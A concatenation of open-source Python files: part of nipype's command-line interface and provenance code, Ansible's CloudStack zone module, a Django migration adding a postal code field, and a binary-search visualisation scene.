self.inputs.ignore_exception:
pass
else:
raise
return results
def _list_outputs(self):
""" List the expected outputs
"""
if self.output_spec:
raise NotImplementedError
else:
return None
def aggregate_outputs(self, runtime=None, needed_outputs=None):
""" Collate expected outputs and check for existence
"""
predicted_outputs = self._list_outputs()
outputs = self._outputs()
if predicted_outputs:
_unavailable_outputs = []
if outputs:
_unavailable_outputs = \
self._check_version_requirements(self._outputs())
for key, val in predicted_outputs.items():
if needed_outputs and key not in needed_outputs:
continue
if key in _unavailable_outputs:
raise KeyError(('Output trait %s not available in version '
'%s of interface %s. Please inform '
'developers.') % (key, self.version,
self.__class__.__name__))
try:
setattr(outputs, key, val)
_ = getattr(outputs, key)
except TraitError, error:
if hasattr(error, 'info') and \
error.info.startswith("an existing"):
msg = ("File/Directory '%s' not found for %s output "
"'%s'." % (val, self.__class__.__name__, key))
raise FileNotFoundError(msg)
else:
raise error
return outputs
@property
def version(self):
if self._version is None:
if str2bool(config.get('execution', 'stop_on_unknown_version')):
raise ValueError('Interface %s has no version information' %
self.__class__.__name__)
return self._version
def write_provenance(self, results, filename='provenance', format='turtle'):
runtime = results.runtime
interface = results.interface
inputs = results.inputs
outputs = results.outputs
classname = self.__class__.__name__
foaf = pm.Namespace("foaf", "http://xmlns.com/foaf/0.1/")
dcterms = pm.Namespace("dcterms", "http://purl.org/dc/terms/")
nipype = pm.Namespace("nipype", "http://nipy.org/nipype/terms/")
get_id = lambda: nipype[uuid1().hex]
# create a provenance container
g = pm.ProvBundle()
# Set the default _namespace name
# g.set_default_namespace(nipype.get_uri())
g.add_namespace(foaf)
g.add_namespace(dcterms)
g.add_namespace(nipype)
a0_attrs = {nipype['module']: self.__module__,
nipype["interface"]: classname,
pm.PROV["label"]: classname,
nipype['duration']: safe_encode(runtime.duration),
nipype['working_directory']: safe_encode(runtime.cwd),
nipype['return_code']: runtime.returncode,
nipype['platform']: safe_encode(runtime.platform),
nipype['version']: safe_encode(runtime.version),
}
try:
a0_attrs[foaf["host"]] = pm.URIRef(runtime.hostname)
except AttributeError:
a0_attrs[foaf["host"]] = pm.Literal(runtime.hostname,
pm.XSD['anyURI'])
try:
a0_attrs.update({nipype['command']: safe_encode(runtime.cmdline)})
a0_attrs.update({nipype['command_path']:
safe_encode(runtime.command_path)})
a0_attrs.update({nipype['dependencies']:
safe_encode(runtime.dependencies)})
except AttributeError:
pass
a0 = g.activity(get_id(), runtime.startTime, runtime.endTime,
a0_attrs)
# environment
id = get_id()
env_collection = g.collection(id)
env_collection.add_extra_attributes({pm.PROV['type']:
nipype['environment'],
pm.PROV['label']: "Environment"})
g.used(a0, id)
# write environment entities
for idx, (key, val) in enumerate(sorted(runtime.environ.items())):
in_attr = {pm.PROV["label"]: key,
nipype["environment_variable"]: key,
nipype["value"]: safe_encode(val)}
id = get_id()
g.entity(id, in_attr)
g.hadMember(env_collection, id)
# write input entities
if inputs:
id = get_id()
input_collection = g.collection(id)
input_collection.add_extra_attributes({pm.PROV['type']:
nipype['inputs'],
pm.PROV['label']: "Inputs"})
g.used(a0, id)
# write input entities
for idx, (key, val) in enumerate(sorted(inputs.items())):
in_attr = {pm.PROV["label"]: key,
nipype["in_port"]: key,
nipype["value"]: safe_encode(val)}
id = get_id()
g.entity(id, in_attr)
g.hadMember(input_collection, id)
# write output entities
if outputs:
id = get_id()
output_collection = g.collection(id)
outputs = outputs.get_traitsfree()
output_collection.add_extra_attributes({pm.PROV['type']:
nipype['outputs'],
pm.PROV['label']:
"Outputs"})
g.wasGeneratedBy(output_collection, a0)
# write input entities
for idx, (key, val) in enumerate(sorted(outputs.items())):
out_attr = {pm.PROV["label"]: key,
nipype["out_port"]: key,
nipype["value"]: safe_encode(val)}
id = get_id()
g.entity(id, out_attr)
g.hadMember(output_collection, id)
# write runtime entities
id = get_id()
runtime_collection = g.collection(id)
runtime_collection.add_extra_attributes({pm.PROV['type']:
nipype['runtime'],
pm.PROV['label']:
"RuntimeInfo"})
g.wasGeneratedBy(runtime_collection, a0)
for key, value in sorted(runtime.items()):
if not value:
continue
if key not in ['stdout', 'stderr', 'merged']:
continue
attr = {pm.PROV["label"]: key,
nipype[key]: safe_encode(value)}
id = get_id()
g.entity(get_id(), attr)
g.hadMember(runtime_collection, id)
# create agents
user_agent = g.agent(get_id(),
{pm.PROV["type"]: pm.PROV["Person"],
pm.PROV["label"]:
pwd.getpwuid(os.geteuid()).pw_name,
foaf["name"]:
safe_encode(pwd.getpwuid(os.geteuid()).pw_name)})
agent_attr = {pm.PROV["type"]: pm.PROV["SoftwareAgent"],
pm.PROV["label"]: "Nipype",
foaf["name"]: safe_encode("Nipype")}
for key, value in get_info().items():
agent_attr.update({nipype[key]: safe_encode(value)})
software_agent = g.agent(get_id(), agent_attr)
g.wasAssociatedWith(a0, user_agent, None, None,
{pm.PROV["Role"]: safe_encode("LoggedInUser")})
g.wasAssociatedWith(a0, software_agent, None, None,
{pm.PROV["Role"]: safe_encode("Software")})
# write provenance
try:
if format in ['turtle', 'all']:
g.rdf().serialize(filename + '.ttl', format='turtle')
except (ImportError, NameError):
format = 'all'
finally:
if format in ['provn', 'all']:
with open(filename + '.provn', 'wt') as fp:
fp.writelines(g.get_provn())
if format in ['json', 'all']:
with open(filename + '.json', 'wt') as fp:
pm.json.dump(g, fp, cls=pm.ProvBundle.JSONEncoder)
return g
class Stream(object):
"""Function to capture stdout and stderr streams with timestamps
stackoverflow.com/questions/4984549/merge-and-sync-stdout-and-stderr/5188359
"""
def __init__(self, name, impl):
self._name = name
self._impl = impl
self._buf = ''
self._rows = []
self._lastidx = 0
def fileno(self):
"Pass-through for file descriptor."
return self._impl.fileno()
def read(self, drain=0):
"Read from the file descriptor. If 'drain' set, read until EOF."
while self._read(drain) is not None:
if not drain:
break
def _read(self, drain):
"Read from the file descriptor"
fd = self.fileno()
buf = os.read(fd, 4096)
if not buf and not self._buf:
return None
if '\n' not in buf:
if not drain:
self._buf += buf
return []
# prepend any data previously read, then split into lines and format
buf = self._buf + buf
if '\n' in buf:
tmp, rest = buf.rsplit('\n', 1)
else:
tmp = buf
rest = None
self._buf = rest
now = datetime.datetime.now().isoformat()
rows = tmp.split('\n')
self._rows += [(now, '%s %s:%s' % (self._name, now, r), r)
for r in rows]
for idx in range(self._lastidx, len(self._rows)):
iflogger.info(self._rows[idx][1])
self._lastidx = len(self._rows)
def run_command(runtime, output=None, timeout=0.01):
"""Run a command, read stdout and stderr, prefix with timestamp.
The returned runtime contains a merged stdout+stderr log with timestamps
"""
PIPE = subprocess.PIPE
proc = subprocess.Popen(runtime.cmdline,
stdout=PIPE,
stderr=PIPE,
shell=True,
cwd=runtime.cwd,
env=runtime.environ)
result = {}
if output == 'stream':
streams = [Stream('stdout', proc.stdout), Stream('stderr', proc.stderr)]
def _process(drain=0):
try:
res = select.select(streams, [], [], timeout)
except select.error, e:
iflogger.info(str(e))
if e[0] == errno.EINTR:
return
else:
raise
else:
for stream in res[0]:
stream.read(drain)
while proc.returncode is None:
proc.poll()
_process()
_process(drain=1)
# collect results, merge and return
result = {}
temp = []
for stream in streams:
rows = stream._rows
temp += rows
result[stream._name] = [r[2] for r in rows]
temp.sort()
result['merged'] = [r[1] for r in temp]
if output == 'allatonce':
stdout, stderr = proc.communicate()
result['stdout'] = stdout.split('\n')
result['stderr'] = stderr.split('\n')
result['merged'] = ''
if output == 'file':
errfile = os.path.join(runtime.cwd, 'stderr.nipype')
outfile = os.path.join(runtime.cwd, 'stdout.nipype')
stderr = open(errfile, 'wt')
stdout = open(outfile, 'wt')
proc = subprocess.Popen(runtime.cmdline,
stdout=stdout,
stderr=stderr,
shell=True,
cwd=runtime.cwd,
env=runtime.environ)
ret_code = proc.wait()
stderr.flush()
stdout.flush()
result['stdout'] = [line.strip() for line in open(outfile).readlines()]
result['stderr'] = [line.strip() for line in open(errfile).readlines()]
result['merged'] = ''
if output == 'none':
proc.communicate()
result['stdout'] = []
result['stderr'] = []
result['merged'] = ''
runtime.stderr = '\n'.join(result['stderr'])
runtime.stdout = '\n'.join(result['stdout'])
runtime.merged = result['merged']
runtime.returncode = proc.returncode
return runtime
def get_dependencies(name, environ):
"""Return library dependencies of a dynamically linked executable
Uses otool on darwin, ldd on linux. Currently doesn't support windows.
"""
PIPE = subprocess.PIPE
if sys.platform == 'darwin':
proc = subprocess.Popen('otool -L `which %s`' % name,
stdout=PIPE,
stderr=PIPE,
shell=True,
env=environ)
elif 'linux' in sys.platform:
proc = subprocess.Popen('ldd `which %s`' % name,
stdout=PIPE,
stderr=PIPE,
shell=True,
env=environ)
else:
return 'Platform %s not supported' % sys.platform
o, e = proc.communicate()
return o.rstrip()
class CommandLineInputSpec(BaseInterfaceInputSpec):
args = traits.Str(argstr='%s', desc='Additional parameters to the command')
environ = traits.DictStrStr(desc='Environment variables', usedefault=True,
nohash=True)
terminal_output = traits.Enum('stream', 'allatonce', 'file', 'none',
desc=('Control terminal output: `stream` - '
'displays to terminal immediately, '
'`allatonce` - waits till command is '
'finished to display output, `file` - '
'writes output to file, `none` - output'
' is ignored'),
nohash=True, mandatory=True)
class CommandLine(BaseInterface):
"""Implements functionality to interact with command line programs
class must be instantiated with a command argument
Parameters
----------
command : string
define base immutable `command` you wish to run
args : string, optional
optional arguments passed to base `command`
Examples
--------
>>> from nipype.interfaces.base import CommandLine
>>> cli = CommandLine(command='ls', environ={'DISPLAY': ':1'})
>>> cli.inputs.args = '-al'
>>> cli.cmdline
'ls -al'
>>> cli.inputs.trait_get() # doctest: +NORMALIZE_WHITESPACE
{'ignore_exception': False, 'terminal_output': 'stream',
'environ': {'DISPLAY': ':1'}, 'args': '-al'}
>>> cli.inputs.get_hashval()
({'args': '-al'}, 'a2f45e04a34630c5f33a75ea2a533cdd')
"""
input_spec = CommandLineInputSpec
_cmd = None
_version = None
_terminal_output = 'stream'
def __init__(self, command=None, **inputs):
super(CommandLine, self).__init__(**inputs)
self._environ = None
if not hasattr(self, '_cmd'):
self._cmd = None
if self.cmd is None and command is None:
raise Exception("Missing command")
if command:
self._cmd = command
self.inputs.on_trait_change(self._terminal_output_update,
'terminal_output')
if not isdefined(self.inputs.terminal_output):
self.inputs.terminal_output = self._terminal_output
else:
self._terminal_output_update()
def _terminal_output_update(self):
self._terminal_output = self.inputs.terminal_output
@classmethod
def set_default_terminal_output(cls, output_type):
"""Set the default output type for FSL classes.
This method is used to set the default output type for all fSL
subclasses. However, setting this will not update the output
type for any existing instances. For these, assign the
<instance>.inputs.output_type.
"""
if output_type in ['stream', 'allatonce', 'file', 'none']:
cls._terminal_output = output_type
else:
raise AttributeError('Invalid terminal output_type: %s' %
output_type)
@property
def cmd(self):
"""sets base command, immutable"""
return self._cmd
@property
def cmdline(self):
""" `command` plus any arguments (args)
validates arguments and generates command line"""
self._check_mandatory_inputs()
allargs = self._parse_inputs()
allargs.insert(0, self.cmd)
return ' '.join(allargs)
def raise_exception(self, runtime):
message = "Command:\n" + runtime.cmdline + "\n"
message += "Standard output:\n" + runtime.stdout + "\n"
message += "Standard error:\n" + runtime.stderr + "\n"
message += "Return code: " + str(runtime.returncode)
raise RuntimeError(message)
@classmethod
def help(cls, returnhelp=False):
allhelp = super(CommandLine, cls).help(returnhelp=True)
allhelp = "Wraps command **%s**\n\n" % cls._cmd + allhelp
if returnhelp:
return allhelp
else:
print(allhelp)
def _get_environ(self):
out_environ = {}
try:
display_var = config.get('execution', 'display_variable')
out_environ = {'DISPLAY': display_var}
except NoOptionError:
pass
#iflogger.debug(out_environ)
if isdefined(self.inputs.environ):
out_environ.update(self.inputs.environ)
return out_environ
def version_from_command(self, flag='-v'):
cmdname = self.cmd.split()[0]
if self._exists_in_path(cmdname):
env = deepcopy(os.environ.data)
out_environ = self._get_environ()
env.update(out_environ)
proc = subprocess.Popen(' '.join((cmdname, flag)),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
o, e = proc.communicate()
return o
def _run_interface(self, runtime, correct_return_codes=[0]):
"""Execute command via subprocess
Parameters
----------
runtime : passed by the run function
Returns
-------
runtime : updated runtime information
adds stdout, stderr, merged, cmdline, dependencies, command_path
"""
setattr(runtime, 'stdout', None)
setattr(runtime, 'stderr', None)
setattr(runtime, 'cmdline', self.cmdline)
out_environ = self._get_environ()
runtime.environ.update(out_environ)
executable_name = self.cmd.split()[0]
exist_val, cmd_path = self._exists_in_path(executable_name,
runtime.environ)
if not exist_val:
raise IOError("%s could not be found on host %s" %
(self.cmd.split()[0], runtime.hostname))
setattr(runtime, 'command_path', cmd_path)
setattr(runtime, 'dependencies', get_dependencies(executable_name,
runtime.environ))
runtime = run_command(runtime, output=self.inputs.terminal_output)
if runtime.returncode is None or \
runtime.returncode not in correct_return_codes:
self.raise_exception(runtime)
return runtime
def _exists_in_path(self, cmd, environ):
'''
Based on a code snippet from
http://orip.org/2009/08/python-checking-if-executable-exists-in.html
'''
if 'PATH' in environ:
input_environ = environ.get("PATH")
else:
input_environ = os.environ.get("PATH", "")
extensions = os.environ.get("PATHEXT", "").split(os.pathsep)
for directory in input_environ.split(os.pathsep):
base = os.path.join(directory, cmd)
options = [base] + [(base + ext) for ext in extensions]
for filename in options:
if os.path.exists(filename):
return True, filename
return False, None
def _format_arg(self, name, trait_spec, value):
"""A helper function for _parse_inputs
Formats a trait containing argstr metadata
"""
argstr = trait_spec.argstr
#iflogger.debug('%s_%s' % (name, str(value)))
if trait_spec.is_trait_type(traits.Bool) and "%" not in argstr:
if value:
# Boolean options have no format string. Just append options
# if True.
return argstr
else:
return None
# traits.Either turns into traits.TraitCompound and does not have any
# inner_traits
elif trait_spec.is_trait_type(traits.List) \
or (trait_spec.is_trait_type(traits.TraitCompound)
and isinstance(value, list)):
# This is a bit simple-minded at present, and should be
# construed as the default. If more sophisticated behavior
# is needed, it can be accomplished with metadata (e.g.
# format string for list member str'ification, specifying
# the separator, etc.)
# Depending on whether we stick with traitlets, and whether or
# not we beef up traitlets.List, we may want to put some
# type-checking code here as well
sep = trait_spec.sep
if sep is None:
sep = ' '
if argstr.endswith('...'):
# repeatable option
# --id %d... will expand to
# --id 1 --id 2 --id 3 etc.,.
argstr = argstr.replace('...', '')
return sep.join([argstr % elt for elt in value])
else:
return argstr % sep.join(str(elt) for elt in value)
else:
# Append options using format string.
return argstr % value
def _filename_from_source(self, name):
trait_spec = self.inputs.trait(name)
retval = getattr(self.inputs, name)
if isdefined(retval):
if "%s" in retval:
if isinstance(trait_spec.name_source, list):
for ns in trait_spec.name_source:
if isdefined(getattr(self.inputs, ns)):
name_source = ns
break
else:
name_source = trait_spec.name_source
if name_source.endswith(os.path.sep):
name_source = name_source[:-len(os.path.sep)]
_, base, _ = split_filename(getattr(self.inputs, name_source))
retval = os.path.abspath(retval % base)
_, _, ext = split_filename(retval)
if trait_spec.keep_extension and ext:
return retval
return self._overload_extension(retval)
return retval
def _gen_filename(self, name):
raise NotImplementedError
def _overload_extension(self, value):
return value
def _list_outputs(self):
metadata = dict(name_source=lambda t: t is not None)
out_names = self.inputs.traits(**metadata).keys()
if out_names:
outputs = self.output_spec().get()
for name in out_names:
outputs[name] = \
os.path.abspath(self._filename_from_source(name))
return outputs
def _parse_inputs(self, skip=None):
"""Parse all inputs using the ``argstr`` format string in the Trait.
Any inputs that are assigned (not the default_value) are formatted
to be added to the command line.
Returns
-------
all_args : list
A list of all inputs formatted for the command line.
"""
all_args = []
initial_args = {}
final_args = {}
metadata = dict(argstr=lambda t: t is not None)
for name, spec in sorted(self.inputs.traits(**metadata).items()):
if skip and name in skip:
continue
value = getattr(self.inputs, name)
if spec.genfile or spec.name_source:
value = self._filename_from_source(name)
if not isdefined(value):
value = self._gen_filename(name)
if not isdefined(value):
continue
arg = self._format_arg(name, spec, value)
if arg is None:
continue
pos = spec.position
if pos is not None:
if pos >= 0:
initial_args[pos] = arg
else:
final_args[pos] = arg
else:
all_args.append(arg)
first_args = [arg for pos, arg in sorted(initial_args.items())]
last_args = [arg for pos, arg in sorted(final_args.items())]
return first_args + all_args + last_args
class StdOutCommandLineInputSpec(CommandLineInputSpec):
out_file = File(argstr="> %s", position=-1, genfile=True)
class StdOutCommandLine(CommandLine):
input_spec = StdOutCommandLineInputSpec
def _gen_filename(self, name):
if name is 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
raise NotImplementedError
class MpiCommandLineInputSpec(CommandLineInputSpec):
use_mpi = traits.Bool(False,
desc="Whether or not to run the command with mpiexec",
usedefault=True)
n_procs = traits.Int(desc="Num processors to specify to mpiexec. Do not "
"specify if this is managed externally (e.g. through "
"SGE)")
class MpiCommandLine(CommandLine):
'''Implements functionality to interact with command line programs
that can be run with MPI (i.e. using 'mpiexec').
Examples
--------
>>> from nipype.interfaces.base import MpiCommandLine
>>> mpi_cli = MpiCommandLine(command='my_mpi_prog')
>>> mpi_cli.inputs.args = '-v'
>>> mpi_cli.cmdline
'my_mpi_prog -v'
>>> mpi_cli.inputs.use_mpi = True
>>> mpi_cli.inputs.n_procs = 8
>>> mpi_cli.cmdline
'mpiexec -n 8 my_mpi_prog -v'
'''
input_spec = MpiCommandLineInputSpec
@property
def cmdline(self):
"""Adds 'mpiexec' to begining of command"""
result = []
if self.inputs.use_mpi:
result.append('mpiexec')
if self.inputs.n_procs:
result.append('-n %d' % self.inputs.n_procs)
result.append(super(MpiCommandLine, self).cmdline)
return ' '.join(result)
class SEMLikeCommandLine(CommandLine):
"""In SEM derived interface all outputs have corresponding inputs.
However, some SEM commands create outputs that are not defined in the XML.
In those cases one has to create a subclass of the autogenerated one and
overload the _list_outputs method. _outputs_from_inputs should still be
used but only for the reduced (by excluding those that do not have
corresponding inputs list of outputs.
"""
def _list_outputs(self):
outputs = self.output_spec().get()
return self._outputs_from_inputs(outputs)
def _outputs_from_inputs(self, outputs):
for name in outputs.keys():
corresponding_input = getattr(self.inputs, name)
if isdefined(corresponding_input):
if (isinstance(corresponding_input, bool) and
corresponding_input):
outputs[name] = \
os.path.abspath(self._outputs_filenames[name])
else:
if isinstance(corresponding_input, list):
outputs[name] = [os.path.abspath(inp)
for inp in corresponding_input]
else:
outputs[name] = os.path.abspath(corresponding_input)
return outputs
def _format_arg(self, name, spec, value):
if name in self._outputs_filenames.keys():
if isinstance(value, bool):
if value:
value = os.path.abspath(self._outputs_filenames[name])
else:
return ""
return super(SEMLikeCommandLine, self)._format_arg(name, spec, value)
class MultiPath(traits.List):
""" Abstract class - shared functionality of input and output MultiPath
"""
def validate(self, object, name, value):
if not isdefined(value) or \
(isinstance(value, list) and len(value) == 0):
return Undefined
newvalue = value
if not isinstance(value, list) \
or (self.inner_traits()
and isinstance(self.inner_traits()[0].trait_type, traits.List)
and not isinstance(self.inner_traits()[0].trait_type,
InputMultiPath)
and isinstance(value, list)
and value
and not isinstance(value[0], list)):
newvalue = [value]
value = super(MultiPath, self).validate(object, name, newvalue)
if len(value) > 0:
return value
self.error(object, name, value)
class OutputMultiPath(MultiPath):
""" Implements a user friendly traits that accepts one or more
paths to files or directories. This is the output version which
return a single string whenever possible (when it was set to a
single value or a list of length 1). Default value of this trait
is _Undefined. It does not accept empty lists.
XXX This should only be used as a final resort. We should stick to
established Traits to the extent possible.
XXX This needs to be vetted by somebody who understands traits
>>> from nipype.interfaces.base import OutputMultiPath
>>> class A(TraitedSpec):
... foo = OutputMultiPath(File(exists=False))
>>> a = A()
>>> a.foo
<undefined>
>>> a.foo = '/software/temp/foo.txt'
>>> a.foo
'/software/temp/foo.txt'
>>> a.foo = ['/software/temp/foo.txt']
>>> a.foo
'/software/temp/foo.txt'
>>> a.foo = ['/software/temp/foo.txt', '/software/temp/goo.txt']
>>> a.foo
['/software/temp/foo.txt', '/software/temp/goo.txt']
"""
def get(self, object, name):
value = self.get_value(object, name)
if len(value) == 0:
return Undefined
elif len(value) == 1:
return value[0]
else:
return value
def set(self, object, name, value):
self.set_value(object, name, value)
class InputMultiPath(MultiPath):
""" Implements a user friendly traits that accepts one or more
paths to files or directories. This is the input version which
always returns a list. Default value of this trait
is _Undefined. It does not accept empty lists.
XXX This should only be used as a final resort. We should stick to
established Traits to the extent possible.
XXX This needs to be vetted by somebody who understands traits
>>> from nipype.interfaces.base import InputMultiPath
>>> class A(TraitedSpec):
... foo = InputMultiPath(File(exists=False))
>>> a = A()
>>> a.foo
<undefined>
>>> a.foo = '/software/temp/foo.txt'
>>> a.foo
['/software/temp/foo.txt']
>>> a.foo = ['/software/temp/foo.txt']
>>> a.foo
['/software/temp/foo.txt']
>>> a.foo = ['/software/temp/foo.txt', '/software/temp/goo.txt']
>>> a.foo
['/software/temp/foo.txt', '/software/temp/goo.txt']
"""
pass
| FredLoney/nipype | nipype/interfaces/base.py | Python | bsd-3-clause | 71,243 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2016, René Moser <mail@renemoser.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_zone
short_description: Manages zones on Apache CloudStack based clouds.
description:
- Create, update and remove zones.
version_added: "2.1"
author: "René Moser (@resmo)"
options:
name:
description:
- Name of the zone.
required: true
id:
description:
- uuid of the existing zone.
default: null
required: false
state:
description:
- State of the zone.
required: false
default: 'present'
choices: [ 'present', 'enabled', 'disabled', 'absent' ]
domain:
description:
- Domain the zone is related to.
- Zone is a public zone if not set.
required: false
default: null
network_domain:
description:
- Network domain for the zone.
required: false
default: null
network_type:
description:
- Network type of the zone.
required: false
default: basic
choices: [ 'basic', 'advanced' ]
dns1:
description:
- First DNS for the zone.
- Required if C(state=present)
required: false
default: null
dns2:
description:
- Second DNS for the zone.
required: false
default: null
internal_dns1:
description:
- First internal DNS for the zone.
- If not set C(dns1) will be used on C(state=present).
required: false
default: null
internal_dns2:
description:
- Second internal DNS for the zone.
required: false
default: null
dns1_ipv6:
description:
- First DNS for IPv6 for the zone.
required: false
default: null
dns2_ipv6:
description:
- Second DNS for IPv6 for the zone.
required: false
default: null
guest_cidr_address:
description:
- Guest CIDR address for the zone.
required: false
default: null
dhcp_provider:
description:
- DHCP provider for the Zone.
required: false
default: null
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
# Ensure a zone is present
- local_action:
module: cs_zone
name: ch-zrh-ix-01
dns1: 8.8.8.8
dns2: 8.8.4.4
network_type: basic
# Ensure a zone is disabled
- local_action:
module: cs_zone
name: ch-zrh-ix-01
state: disabled
# Ensure a zone is enabled
- local_action:
module: cs_zone
name: ch-zrh-ix-01
state: enabled
# Ensure a zone is absent
- local_action:
module: cs_zone
name: ch-zrh-ix-01
state: absent
'''
RETURN = '''
---
id:
description: UUID of the zone.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the zone.
returned: success
type: string
sample: zone01
dns1:
description: First DNS for the zone.
returned: success
type: string
sample: 8.8.8.8
dns2:
description: Second DNS for the zone.
returned: success
type: string
sample: 8.8.4.4
internal_dns1:
description: First internal DNS for the zone.
returned: success
type: string
sample: 8.8.8.8
internal_dns2:
description: Second internal DNS for the zone.
returned: success
type: string
sample: 8.8.4.4
dns1_ipv6:
description: First IPv6 DNS for the zone.
returned: success
type: string
sample: "2001:4860:4860::8888"
dns2_ipv6:
description: Second IPv6 DNS for the zone.
returned: success
type: string
sample: "2001:4860:4860::8844"
allocation_state:
description: State of the zone.
returned: success
type: string
sample: Enabled
domain:
description: Domain the zone is related to.
returned: success
type: string
sample: ROOT
network_domain:
description: Network domain for the zone.
returned: success
type: string
sample: example.com
network_type:
description: Network type for the zone.
returned: success
type: string
sample: basic
local_storage_enabled:
description: Local storage offering enabled.
returned: success
type: bool
sample: false
securitygroups_enabled:
description: Security groups support is enabled.
returned: success
type: bool
sample: false
guest_cidr_address:
description: Guest CIDR address for the zone
returned: success
type: string
sample: 10.1.1.0/24
dhcp_provider:
description: DHCP provider for the zone
returned: success
type: string
sample: VirtualRouter
zone_token:
description: Zone token
returned: success
type: string
sample: ccb0a60c-79c8-3230-ab8b-8bdbe8c45bb7
tags:
description: List of resource tags associated with the zone.
returned: success
type: dict
sample: [ { "key": "foo", "value": "bar" } ]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
CloudStackException,
cs_argument_spec,
cs_required_together,
)
class AnsibleCloudStackZone(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackZone, self).__init__(module)
self.returns = {
'dns1': 'dns1',
'dns2': 'dns2',
'internaldns1': 'internal_dns1',
'internaldns2': 'internal_dns2',
'ipv6dns1': 'dns1_ipv6',
'ipv6dns2': 'dns2_ipv6',
'domain': 'network_domain',
'networktype': 'network_type',
'securitygroupsenabled': 'securitygroups_enabled',
'localstorageenabled': 'local_storage_enabled',
'guestcidraddress': 'guest_cidr_address',
'dhcpprovider': 'dhcp_provider',
'allocationstate': 'allocation_state',
'zonetoken': 'zone_token',
}
self.zone = None
def _get_common_zone_args(self):
args = {
'name': self.module.params.get('name'),
'dns1': self.module.params.get('dns1'),
'dns2': self.module.params.get('dns2'),
'internaldns1': self.get_or_fallback('internal_dns1', 'dns1'),
'internaldns2': self.get_or_fallback('internal_dns2', 'dns2'),
'ipv6dns1': self.module.params.get('dns1_ipv6'),
'ipv6dns2': self.module.params.get('dns2_ipv6'),
'networktype': self.module.params.get('network_type'),
'domain': self.module.params.get('network_domain'),
'localstorageenabled': self.module.params.get('local_storage_enabled'),
'guestcidraddress': self.module.params.get('guest_cidr_address'),
'dhcpprovider': self.module.params.get('dhcp_provider'),
}
state = self.module.params.get('state')
if state in ['enabled', 'disabled']:
args['allocationstate'] = state.capitalize()
return args
def get_zone(self):
if not self.zone:
args = {}
uuid = self.module.params.get('id')
if uuid:
args['id'] = uuid
zones = self.cs.listZones(**args)
if zones:
self.zone = zones['zone'][0]
return self.zone
args['name'] = self.module.params.get('name')
zones = self.cs.listZones(**args)
if zones:
self.zone = zones['zone'][0]
return self.zone
def present_zone(self):
zone = self.get_zone()
if zone:
zone = self._update_zone()
else:
zone = self._create_zone()
return zone
def _create_zone(self):
required_params = [
'dns1',
]
self.module.fail_on_missing_params(required_params=required_params)
self.result['changed'] = True
args = self._get_common_zone_args()
args['domainid'] = self.get_domain(key='id')
args['securitygroupenabled'] = self.module.params.get('securitygroups_enabled')
zone = None
if not self.module.check_mode:
res = self.cs.createZone(**args)
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
zone = res['zone']
return zone
def _update_zone(self):
zone = self.get_zone()
args = self._get_common_zone_args()
args['id'] = zone['id']
if self.has_changed(args, zone):
self.result['changed'] = True
if not self.module.check_mode:
res = self.cs.updateZone(**args)
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
zone = res['zone']
return zone
def absent_zone(self):
zone = self.get_zone()
if zone:
self.result['changed'] = True
args = {
'id': zone['id']
}
if not self.module.check_mode:
res = self.cs.deleteZone(**args)
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
return zone
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
id=dict(),
name=dict(required=True),
dns1=dict(),
dns2=dict(),
internal_dns1=dict(),
internal_dns2=dict(),
dns1_ipv6=dict(),
dns2_ipv6=dict(),
network_type=dict(default='basic', choices=['Basic', 'basic', 'Advanced', 'advanced']),
network_domain=dict(),
guest_cidr_address=dict(),
dhcp_provider=dict(),
local_storage_enabled=dict(type='bool'),
securitygroups_enabled=dict(type='bool'),
state=dict(choices=['present', 'enabled', 'disabled', 'absent'], default='present'),
domain=dict(),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=cs_required_together(),
supports_check_mode=True
)
try:
acs_zone = AnsibleCloudStackZone(module)
state = module.params.get('state')
if state in ['absent']:
zone = acs_zone.absent_zone()
else:
zone = acs_zone.present_zone()
result = acs_zone.get_result(zone)
except CloudStackException as e:
module.fail_json(msg='CloudStackException: %s' % str(e))
module.exit_json(**result)
if __name__ == '__main__':
main()
| DepthDeluxe/ansible | lib/ansible/modules/cloud/cloudstack/cs_zone.py | Python | gpl-3.0 | 11,062 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-18 23:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('politicalplaces', '0008_auto_20170317_1636'),
]
operations = [
migrations.AddField(
model_name='politicalplace',
name='postal_code',
field=models.CharField(blank=True, max_length=255),
),
]
| 20tab/django-political-map | politicalplaces/migrations/0009_politicalplace_postal_code.py | Python | mit | 483 |
import random
from . import base
import alvi.client.containers
class BinarySearch(base.Scene):
def init(self, array, n):
array.init(n)
array.sync()
def generate_points(self, array, data_generator):
for i, value in enumerate(data_generator.values):
array[i] = value
array.sync()
def search(self, array, value):
left = 0
right = array.size()-1
left_marker = array.create_marker("left", left)
right_marker = array.create_marker("right", right)
array.sync()
while left <= right:
mid = (right + left) // 2
if array[mid] > value:
right = mid - 1
if right >= 0:
right_marker.move(right)
elif array[mid] < value:
left = mid + 1
if left < array.size():
left_marker.move(left)
else:
array.stats.found_id = mid
array.create_marker("found", mid)
array.sync()
left_marker.remove()
right_marker.remove()
return
array.sync()
array.stats.not_found = ""
